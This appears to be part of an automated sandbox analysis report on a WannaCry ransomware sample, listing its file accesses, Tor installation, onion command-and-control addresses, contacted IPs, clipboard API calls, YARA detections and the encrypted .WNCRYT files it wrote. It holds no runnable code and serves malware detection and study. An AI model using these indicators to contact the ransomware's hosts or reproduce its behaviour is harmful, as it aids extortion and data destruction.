                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE033.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE037.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE038.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDE035.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDE036.tmpJump to behavior

                  Networking

                  barindex
                  Installs TOR (Internet Anonymizer)
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to behavior
                  Found Tor onion address
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7374394237.0000000000198000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4451729871.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.9.158.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.9.158.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.9.158.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.9.158.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.9.158.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.9.158.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.25.193.9
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
                  Source: @WanaDecryptor@.exeString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
                  Source: WannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365094465.0000000002791000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000003.4365358395.0000000002798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
                  Source: taskhsvc.exe, 0000001D.00000003.4413396862.0000000003710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://386bsd.net
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
                  Source: @WanaDecryptor@.exeString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7374394237.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip8B
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://trac.torproject.org/8742
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
                  Source: @WanaDecryptor@.exeString found in binary or memory: https://www.google.com/search?q=how
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.torproject.org/
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.torproject.org/download/download#warning
                  Source: taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040DB80 recv,25_2_0040DB80
                  Source: unknownHTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49840 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49865 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to modify clipboard data
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00407C30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,25_2_004035A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,28_2_00407C30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,28_2_004035A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,37_2_00407C30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,37_2_004035A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,25_2_00407C30

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Yara detected Conti ransomware
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 2380, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 6116, type: MEMORYSTR
                  Detected Wannacry Ransomware
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!25_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!28_2_004020A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!37_2_004020A0
                  Yara detected Wannacry ransomware
                  Source: Yara matchFile source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 49.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 49.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 52.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 52.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 37.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000034.00000002.5732242026.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000031.00000000.5428511190.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000000.4517258292.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002B.00000000.4824076441.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000031.00000002.5430205338.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002B.00000002.4826014991.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002E.00000002.5128621627.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002E.00000000.5126549590.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000034.00000000.5730513383.000000000041F000.00000008.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: WannaCrypt0r.sk PID: 1300, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 2380, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: @WanaDecryptor@.exe PID: 6116, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\Desktop\u.wnry, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED
                  Source: Yara matchFile source: C:\@WanaDecryptor@.exe, type: DROPPED
                  Modifies existing user documents (likely ransomware behavior)
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile moved: C:\Users\user\Desktop\ZQIXMVQGAH\PIVFAGEAAV.jpgJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile moved: C:\Users\user\Desktop\PIVFAGEAAV.jpgJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile moved: C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdfJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile moved: C:\Users\user\Desktop\PWCCAWLGRE.mp3Jump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile moved: C:\Users\user\Desktop\GAOBCVIQIJ\NVWZAPQSQL.jpgJump to behavior
                  Writes many files with high entropy
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.sk entropy: 7.99547094116Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99365463856Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99983740974Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT entropy: 7.99517561232Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99310446081Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99160372259Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT entropy: 7.99160943209Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99981239664Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99996235843Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99991993003Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99994401127Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.997282021Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99981494718Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99982801931Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99982346579Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99979235793Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995535799Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99363403058Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99978935975Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRYT entropy: 7.99089203949Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT entropy: 7.99217536389Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT entropy: 7.99983002527Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRYT entropy: 7.99534123292Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRYT entropy: 7.99886185801Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99327545755Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRYT entropy: 7.99672373611Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRYT entropy: 7.99714354794Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.9998792411Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{730830dd-534f-42c8-8160-bd245bf51290}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99442180692Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99991986864Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129748497427.txt.WNCRYT entropy: 7.99823243673Jump to dropped file
